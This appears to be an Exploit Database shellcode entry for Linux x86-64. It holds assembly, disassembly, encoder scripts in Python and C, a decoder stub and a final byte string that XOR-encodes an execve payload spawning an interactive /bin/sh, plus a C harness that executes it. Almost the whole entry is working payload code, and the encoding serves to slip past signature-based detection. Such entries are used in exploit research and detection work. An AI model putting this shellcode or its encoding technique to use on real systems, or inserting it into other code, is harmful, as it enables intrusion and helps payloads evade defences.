Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)

EDB-ID:

39869

CVE:

N/A




Platform:

Linux_x86-64

Date:

2016-05-30


/* 
	# Title : Linux x86_64 XOR encode execve("/bin//sh",{"//bin/sh","-i",NULL},NULL) shellcode
	# Date : 31-05-2016
	# Author : Roziul Hasan Khan Shifat
	# Tested On : Ubuntu 14.04 LTS x86_64
*/


/* 								
				main code 
			------------------------
												
section .text
	global _start
_start:

xor rax,rax
xor rdx,rdx

push rax
push rax

mov [rsp],dword '//bi'
mov [rsp+4],dword 'n/sh'


mov rdi,rsp


push rax
push rax

mov [rsp],word '-i'
mov rsi,rsp

push rdx
push rsi
push rdi

mov rsi,rsp

add rax,59
syscall


					Disassembly
				     ------------------
Disassembly of section .text:

0000000000400080 <_start>:
  400080:	48 31 c0             	xor    %rax,%rax
  400083:	48 31 d2             	xor    %rdx,%rdx
  400086:	50                   	push   %rax
  400087:	50                   	push   %rax
  400088:	c7 04 24 2f 2f 62 69 	movl   $0x69622f2f,(%rsp)
  40008f:	c7 44 24 04 6e 2f 73 	movl   $0x68732f6e,0x4(%rsp)
  400096:	68 
  400097:	48 89 e7             	mov    %rsp,%rdi
  40009a:	50                   	push   %rax
  40009b:	50                   	push   %rax
  40009c:	66 c7 04 24 2d 69    	movw   $0x692d,(%rsp)
  4000a2:	48 89 e6             	mov    %rsp,%rsi
  4000a5:	52                   	push   %rdx
  4000a6:	56                   	push   %rsi
  4000a7:	57                   	push   %rdi
  4000a8:	48 89 e6             	mov    %rsp,%rsi
  4000ab:	48 83 c0 3b          	add    $0x3b,%rax
  4000af:	0f 05                	syscall
  
*/


/*

					encoder
				   --------------
I used a python script and a C program to encode shellcode


						python script
					   ---------------------	
a="\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\x66\xc7\x04\x24\x2d\x69\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
print "shellcode length %d"%len(a)
a=a[::-1]

for i in range(len(a)-1):
	print a[i].encode('hex')


						C program
	       				    -----------------
														
#include<stdio.h>
#include<string.h>
main(int i,char *a[])
{
if(i!=2)
{
printf("Usage %s <filename>\n",a[0]);
return 0;
}



FILE *f,*o;
f=fopen(a[1],"r");
int shell;

o=fopen("shellencode.txt","w");
if(!f || !o )
{
perror("FILE I/O error: ");
return 0;
}

while( (fscanf(f,"%x",&shell)) !=EOF )
{
printf("%.2x\n",shell);
fprintf(o,"%#.2x,",shell^0x90); //0x90 is seed key
fflush(o);
}


fclose(o);
fclose(f);
return 0;
}
														
---------------------------------------------------------------------------------------------------------------------------------
I am sorry that My python script is very Poor .Search internet for better XOR encoder python script
MY Python script Reverse the shellcode 
Then COPY & Paste the rerversed shellcode into a file
then i use the C program to encode reversed shellcode and write down shellencode.txt
----------------------------------------------------------------------------------------------------------------------------- 														

*/


/*
					decoder
				    ---------------
section .text
	global _start
_start:

jmp shellcode


decoder:
pop rsi
xor rcx,rcx
mov cl,49

cdq

mov dl,0x90 ;seed key

decode:
xor rax,rax
mov al,[rsi]
xor al,dl
dec rsp
mov [rsp],byte al
inc rsi
loop decode

call rsp


shellcode:
call decoder
 db 0x95,0x9f,0xab,0x50,0x13,0xd8,0x76,0x19,0xd8,0xc7,0xc6,0xc2,0x76,0x19,0xd8,0xf9,0xbd,0xb4,0x94,0x57,0xf6,0xc0,0xc0,0x77,0x19,0xd8,0xf8,0xe3,0xbf,0xfe,0x94,0xb4,0xd4,0x57,0xf9,0xf2,0xbf,0xbf,0xb4,0x94,0x57,0xc0,0xc0,0x42,0xa1,0xd8,0x50,0xa1


					Disassembly
				   -------------------

Disassembly of section .text:

0000000000400080 <_start>:
  400080:	eb 1d                	jmp    40009f <shellcode>

0000000000400082 <decoder>:
  400082:	5e                   	pop    %rsi
  400083:	48 31 c9             	xor    %rcx,%rcx
  400086:	b1 31                	mov    $0x31,%cl
  400088:	99                   	cltd   
  400089:	b2 90                	mov    $0x90,%dl

000000000040008b <decode>:
  40008b:	48 31 c0             	xor    %rax,%rax
  40008e:	8a 06                	mov    (%rsi),%al
  400090:	30 d0                	xor    %dl,%al
  400092:	48 ff cc             	dec    %rsp
  400095:	88 04 24             	mov    %al,(%rsp)
  400098:	48 ff c6             	inc    %rsi
  40009b:	e2 ee                	loop   40008b <decode>
  40009d:	ff d4                	callq  *%rsp

000000000040009f <shellcode>:
  40009f:	e8 de ff ff ff       	callq  400082 <decoder>
  4000a4:	95                   	xchg   %eax,%ebp
  4000a5:	9f                   	lahf   
  4000a6:	ab                   	stos   %eax,%es:(%rdi)
  4000a7:	50                   	push   %rax
  4000a8:	13 d8                	adc    %eax,%ebx
  4000aa:	76 19                	jbe    4000c5 <shellcode+0x26>
  4000ac:	d8 c7                	fadd   %st(7),%st
  4000ae:	c6 c2 76             	mov    $0x76,%dl
  4000b1:	19 d8                	sbb    %ebx,%eax
  4000b3:	f9                   	stc    
  4000b4:	bd b4 94 57 f6       	mov    $0xf65794b4,%ebp
  4000b9:	c0 c0 77             	rol    $0x77,%al
  4000bc:	19 d8                	sbb    %ebx,%eax
  4000be:	f8                   	clc    
  4000bf:	e3 bf                	jrcxz  400080 <_start>
  4000c1:	fe                   	(bad)  
  4000c2:	94                   	xchg   %eax,%esp
  4000c3:	b4 d4                	mov    $0xd4,%ah
  4000c5:	57                   	push   %rdi
  4000c6:	f9                   	stc    
  4000c7:	f2 bf bf b4 94 57    	repnz mov $0x5794b4bf,%edi
  4000cd:	c0 c0 42             	rol    $0x42,%al
  4000d0:	a1                   	.byte 0xa1
  4000d1:	d8 50 a1             	fcoms  -0x5f(%rax)

*/

/*
The shellcode decoder.asm is the encoded shellcode
*/  


char shellcode[]="\xeb\x1d\x5e\x48\x31\xc9\xb1\x31\x99\xb2\x90\x48\x31\xc0\x8a\x06\x30\xd0\x48\xff\xcc\x88\x04\x24\x48\xff\xc6\xe2\xee\xff\xd4\xe8\xde\xff\xff\xff\x95\x9f\xab\x50\x13\xd8\x76\x19\xd8\xc7\xc6\xc2\x76\x19\xd8\xf9\xbd\xb4\x94\x57\xf6\xc0\xc0\x77\x19\xd8\xf8\xe3\xbf\xfe\x94\xb4\xd4\x57\xf9\xf2\xbf\xbf\xb4\x94\x57\xc0\xc0\x42\xa1\xd8\x50\xa1";


int main(int i,char *a[])
{
(* (int(*)()) shellcode)();

}